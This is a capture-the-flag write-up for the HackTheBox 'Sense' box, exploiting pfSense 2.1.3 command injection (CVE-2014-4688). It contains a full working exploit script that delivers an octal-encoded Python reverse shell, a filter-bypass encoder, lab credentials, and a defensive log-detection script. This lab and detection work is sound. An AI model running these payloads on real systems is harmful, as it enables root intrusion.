HTB — Sense
Web | Medium | FreeBSD
pfSense 2.1.3 authenticated command injection (CVE-2014-4688). Credentials found via directory fuzzing on the web interface.
March 29, 2022 | HackTheBox
#pfSense #Command Injection #CVE-2014-4688 #Fuzzing
Enumeration
```sh
nmap -sC -sV -vv 10.10.10.60 -oN sense
```

```sh
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http syn-ack ttl 63 lighttpd 1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US/emailAddress=Email Address/organizationalUnitName=Organizational Unit Name (eg, section)/localityName=Somecity
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US/emailAddress=Email Address/organizationalUnitName=Organizational Unit Name (eg, section)/localityName=Somecity
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after: 2023-04-06T19:21:35
| MD5: 65f8 b00f 57d2 3468 2c52 0f44 8110 c622
| SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
| -----BEGIN CERTIFICATE-----
| MIIEKDCCA5GgAwIBAgIJALChaIpiwz41MA0GCSqGSIb3DQEBCwUAMIG/MQswCQYD
| VQQGEwJVUzESMBAGA1UECBMJU29tZXdoZXJlMREwDwYDVQQHEwhTb21lY2l0eTEU
| MBIGA1UEChMLQ29tcGFueU5hbWUxLzAtBgNVBAsTJk9yZ2FuaXphdGlvbmFsIFVu
| aXQgTmFtZSAoZWcsIHNlY3Rpb24pMSQwIgYDVQQDExtDb21tb24gTmFtZSAoZWcs
| IFlPVVIgbmFtZSkxHDAaBgkqhkiG9w0BCQEWDUVtYWlsIEFkZHJlc3MwHhcNMTcx
| MDE0MTkyMTM1WhcNMjMwNDA2MTkyMTM1WjCBvzELMAkGA1UEBhMCVVMxEjAQBgNV
| BAgTCVNvbWV3aGVyZTERMA8GA1UEBxMIU29tZWNpdHkxFDASBgNVBAoTC0NvbXBh
| bnlOYW1lMS8wLQYDVQQLEyZPcmdhbml6YXRpb25hbCBVbml0IE5hbWUgKGVnLCBz
| ZWN0aW9uKTEkMCIGA1UEAxMbQ29tbW9uIE5hbWUgKGVnLCBZT1VSIG5hbWUpMRww
| GgYJKoZIhvcNAQkBFg1FbWFpbCBBZGRyZXNzMIGfMA0GCSqGSIb3DQEBAQUAA4GN
| ADCBiQKBgQC/sWU6By08lGbvttAfx47SWksgA7FavNrEoW9IRp0W/RF9Fp5BQesL
| L3FMJ0MHyGcfRhnL5VwDCL0E+1Y05az8PY8kUmjvxSvxQCLn6Mh3nTZkiAJ8vpB0
| WAnjltrTCEsv7Dnz2OofkpqaUnoNGfO3uKWPvRXl9OlSe/BcDStffQIDAQABo4IB
| KDCCASQwHQYDVR0OBBYEFDK5DS/hTsi9SHxT749Od/p3Lq05MIH0BgNVHSMEgeww
| gemAFDK5DS/hTsi9SHxT749Od/p3Lq05oYHFpIHCMIG/MQswCQYDVQQGEwJVUzES
| MBAGA1UECBMJU29tZXdoZXJlMREwDwYDVQQHEwhTb21lY2l0eTEUMBIGA1UEChML
| Q29tcGFueU5hbWUxLzAtBgNVBAsTJk9yZ2FuaXphdGlvbmFsIFVuaXQgTmFtZSAo
| ZWcsIHNlY3Rpb24pMSQwIgYDVQQDExtDb21tb24gTmFtZSAoZWcsIFlPVVIgbmFt
| ZSkxHDAaBgkqhkiG9w0BCQEWDUVtYWlsIEFkZHJlc3OCCQCwoWiKYsM+NTAMBgNV
| HRMEBTADAQH/MA0GCSqGSIb3DQEBCwUAA4GBAHNn+1AX2qwJ9zhgN3I4ES1Vq84l
| n6p7OoBefxcf31Pn3VDnbvJJFFcZdplDxbIWh5lyjpTHRJQyHECtEMW677rFXJAl
| /cEYWHDndn9Gwaxn7JyffK5lUAPMPEDtudQb3cxrevP/iFZwefi2d5p3jFkDCcGI
| +Y0tZRIRzHWgQHa/
|_-----END CERTIFICATE-----
|_http-title: Login
|_http-favicon: Unknown favicon MD5: 082559A7867CF27ACAB7E9867A8B320F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_ssl-date: TLS randomness does not represent time
|_http-server-header: lighttpd/1.4.35
```

Only the web interface is exposed: port 80 redirects to 443, where lighttpd 1.4.35 serves a login page. The self-signed certificate still carries the placeholder subject fields and a 1024-bit RSA key.

Directory Enum

Fuzzing the HTTPS web root turns up the usual pfSense scripts plus two text files worth reading, changelog.txt and system-users.txt.
```sh
/ 200 7204
index.php 200 453
help.php 200 453
stats.php 200 453
themes ??? ???
pfsense_ng ??? ???
javascript ??? ???
niftyjsCode.js 200 5002
csrf ??? ???
csrf-magic.js 200 7511
javascript ??? ???
jquery.js 200 245502
edit.php 200 453
license.php 200 453
system.php 200 453
status.php 200 453
changelog.txt 200 583
exec.php 200 453
graph.php 200 453
tree 200 8007
tree.js 200 5451
wizard.php 200 472
pkg.php 200 453
installer 302 243
index.php 302 224
installer.php 200 453
xmlrpc.php 200 614
reboot.php 200 453
interfaces.php 200 453
system-users.txt 200 394
```

- Potential username: Rohit (from system-users.txt)
- Potential passwords: pfsense_ng (from the directory name above) and pfsense (the pfSense default)
- Working login: rohit : pfsense

Exploitation and Privilege Escalation

No separate privilege-escalation step is needed on this box: pfSense runs its web server and PHP as root, so a command injection in the web GUI already executes as root.

Metasploit
```sh
msfconsole
search pfsense
```

- exploit/unix/http/pfsense_group_member_exec was tried first but did not work against this box; the configuration had not been changed since 2017 and the target is still on 2.1.3.
- exploit/unix/http/pfsense_graph_injection_exec, the Metasploit module for CVE-2014-4688, worked and returned a root shell.

```sh
cd /home/rohit
cat user.txt
-> ZmxhZ3tOb3RfSW5fSGVyZX0=
cd /root
cat root.txt
-> ZmxhZ3tOb3RfSW5fSGVyZX0=
```

Without Metasploit
- https://www.exploit-db.com/exploits/43560

```sh
searchsploit 43560
```

The same script is in the local Exploit-DB copy; `searchsploit -m 43560` mirrors it into the current directory.

```python
#!/usr/bin/env python3
# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688

import argparse
import collections
import urllib.parse

import requests
import urllib3

'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''

parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help="Remote Host")
parser.add_argument('--lhost', help='Local Host listener')
parser.add_argument('--lport', help='Local Port listener')
parser.add_argument("--username", help="pfsense Username")
parser.add_argument("--password", help="pfsense Password")
args = parser.parse_args()

rhost = args.rhost
lhost = args.lhost
lport = args.lport
username = args.username
password = args.password

# command to be converted into octal
command = """
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("%s",%s));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
""" % (lhost, lport)

payload = ""
# encode payload in octal: every character becomes a \ooo escape that printf(1) expands
for char in command:
    payload += ("\\" + oct(ord(char)).lstrip("0o"))

login_url = 'https://' + rhost + '/index.php'
# the injection point: the database parameter is passed to a shell unescaped
exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;" + "printf+" + "'" + payload + "'|sh"

headers = [
    ('User-Agent', 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
    ('Accept-Language', 'en-US,en;q=0.5'),
    ('Referer', login_url),
    ('Connection', 'close'),
    ('Upgrade-Insecure-Requests', '1'),
    ('Content-Type', 'application/x-www-form-urlencoded')
]
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)

# Disable insecure https connection warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

client = requests.session()

# try to get the login page and grab the csrf token
try:
    login_page = client.get(login_url, verify=False)
    index = login_page.text.find("csrfMagicToken")
    csrf_token = login_page.text[index:index + 128].split('"')[-1]
except Exception:
    print("Could not connect to host!")
    exit()

# format login variables and data
if csrf_token:
    print("CSRF token obtained")
    login_data = [('__csrf_magic', csrf_token), ('usernamefld', username), ('passwordfld', password), ('login', 'Login')]
    login_data = collections.OrderedDict(login_data)
    encoded_data = urllib.parse.urlencode(login_data)
    # POST login request with data, cookies and header
    login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers)
else:
    print("No CSRF token!")
    exit()

if login_request.status_code == 200:
    print("Running exploit...")
    # make GET request to vulnerable url with payload. Probably a better way to do this
    # but if the request times out then most likely you have caught the shell
    try:
        exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5)
        if exploit_request.status_code:
            print("Error running exploit")
    except Exception:
        print("Exploit completed")
```
Start the listener first; the script treats a timeout on the final GET as success, because the injected shell never returns a response.

```sh
nc -lvnp 1234
```

```sh
python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.4 --lport 1234 --username rohit --password pfsense
```
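The "strict filtering" the script works around is handled by the printf trick: the injected fragment never contains the reverse shell's quotes, parentheses, commas or spaces, only `printf`, a quoted run of `\ooo` octal escapes and `|sh`. The block below is an added example of mine, not code from the writeup or from the exploit author: it encodes an arbitrary command the same way, shows which metacharacters survive encoding, and decodes the escapes offline the way printf(1) would to confirm the round trip. RHOST is the box address from the writeup; DEMO_COMMAND is a constructed placeholder.

```python
#!/usr/bin/env python3
"""Added example (not from the writeup or the exploit author): encode a command
as printf(1) octal escapes so the injected fragment carries only a handful of
shell metacharacters, then verify the round trip offline.  RHOST is the box
from the writeup; DEMO_COMMAND is a constructed placeholder."""
import re
import string

RHOST = "10.10.10.60"
# Constructed demo command full of characters a naive filter would block.
DEMO_COMMAND = "id > /tmp/out; echo \"done\" && cat '/etc/passwd' | head -1"


def octal_escape(text: str) -> str:
    """One \\ooo escape per byte.  Three digits is the unambiguous form; the
    exploit's variable-width oct() form works too, because every escape
    starts with a backslash."""
    return "".join("\\%03o" % b for b in text.encode("ascii"))


def printf_decode(escaped: str) -> str:
    """What printf(1) turns the escapes back into: one to three octal digits
    after each backslash.  Pure string processing, nothing is executed."""
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), escaped)


def build_injection(command: str) -> str:
    """Fragment appended to the legitimate database name (queues;...)."""
    return ";printf '%s'|sh" % octal_escape(command)


def build_exploit_url(rhost: str, command: str) -> str:
    """Same shape as the exploit's URL: the one literal space (after printf)
    is sent as '+', everything else rides inside the octal escapes."""
    return "https://%s/status_rrd_graph_img.php?database=queues%s" % (
        rhost, build_injection(command).replace(" ", "+"))


def special_chars(s: str) -> set:
    """Characters outside [A-Za-z0-9], i.e. what a metacharacter filter inspects."""
    return {c for c in s if c not in string.ascii_letters + string.digits}


def shell_receives(command: str) -> str:
    """Simulate the target: sh runs printf '<escapes>' and pipes the output
    into a second sh, so this is the command that second sh executes."""
    injection = build_injection(command)
    quoted = injection[len(";printf '"):-len("'|sh")]
    return printf_decode(quoted)


if __name__ == "__main__":
    print(build_exploit_url(RHOST, DEMO_COMMAND))
    print("metacharacters before encoding:", sorted(special_chars(DEMO_COMMAND)))
    print("metacharacters after encoding: ", sorted(special_chars(build_injection(DEMO_COMMAND))))
    assert shell_receives(DEMO_COMMAND) == DEMO_COMMAND
```

Whatever the original command contains, the encoded fragment only ever needs `;`, a space, `'`, `\` and `|` to pass through, which is why the technique survives filters that strip or reject the usual quoting and grouping characters.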
Skills Learned
- Modifying publicly available exploits
- Bypassing strict filtering
- Exploiting pfSense
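From the defender's side the telltale is a `database` parameter to status_rrd_graph_img.php that is not a plain RRD file name. The following is an added example of mine, not from the writeup: it runs that check over a few constructed lighttpd-style access-log lines. The log layout, addresses and requests are assumptions made for the demo.

```python
#!/usr/bin/env python3
"""Added example (not from the writeup): spot CVE-2014-4688-style requests in
web-server access logs.  SAMPLE_LOG is constructed for the demo and follows an
Apache/lighttpd "combined"-style layout; the addresses are assumptions."""
import re
from urllib.parse import urlsplit, unquote_plus

VULN_PATH = "/status_rrd_graph_img.php"
# A real RRD database name is just a file name: letters, digits, '-', '_', '.'.
SAFE_DB_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")
METACHARS = set(";|&`$<>\n")
# Two or more consecutive \ooo escapes: the printf encoding used by the exploit.
OCTAL_RUN = re.compile(r"(\\[0-7]{1,3}){2,}")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

SAMPLE_LOG = [
    # legitimate graph request from the pfSense UI (constructed)
    '10.10.14.9 10.10.10.60 - [29/Mar/2022:10:00:01 +0000] "GET /status_rrd_graph_img.php?database=wan-traffic.rrd&style=inverse&graph=4hours HTTP/1.1" 200 5120 "https://10.10.10.60/status_rrd_graph.php" "Mozilla/5.0"',
    # the exploit's request with quotes, backslashes and pipe percent-encoded (constructed)
    '10.10.14.4 10.10.10.60 - [29/Mar/2022:10:05:12 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+%27%5C151%5C144%27%7Csh HTTP/1.1" 200 614 "https://10.10.10.60/index.php" "Mozilla/5.0"',
    # same injection point, plain command, no printf encoding (constructed)
    '10.10.14.4 10.10.10.60 - [29/Mar/2022:10:06:40 +0000] "GET /status_rrd_graph_img.php?database=queues;id|sh HTTP/1.1" 200 614 "-" "curl/7.81.0"',
    # metacharacters in some other script's parameter: out of scope for this rule (constructed)
    '10.10.14.9 10.10.10.60 - [29/Mar/2022:10:07:00 +0000] "GET /diag_logs_filter.php?filtertext=a%7Cb HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]


def parse_query(query: str) -> dict:
    """Split on '&' only and percent-decode.  Older parse_qsl() also split on
    ';', which would hide exactly the separator the injection relies on."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def analyze_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if target.path != VULN_PATH:
        return None
    database = parse_query(target.query).get("database")
    if database is None:
        return None
    reasons = []
    if not SAFE_DB_NAME.match(database):
        found = sorted(set(database) & METACHARS)
        if found:
            reasons.append("shell metacharacters %s in database parameter" % "".join(found))
        else:
            reasons.append("database parameter is not a plain file name")
    if OCTAL_RUN.search(database):
        reasons.append("printf octal-escaped payload")
    if not reasons:
        return None
    return {"client": line.split()[0], "database": database, "reasons": reasons}


def scan(lines):
    """All findings from an iterable of log lines, in log order."""
    return [f for f in map(analyze_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The rule decodes the parameter before inspecting it, so percent-encoding the quotes, backslashes or pipe does not evade it, and it keys on the parameter's shape rather than on the exploit's exact payload, so a plain `queues;id|sh` is caught as well.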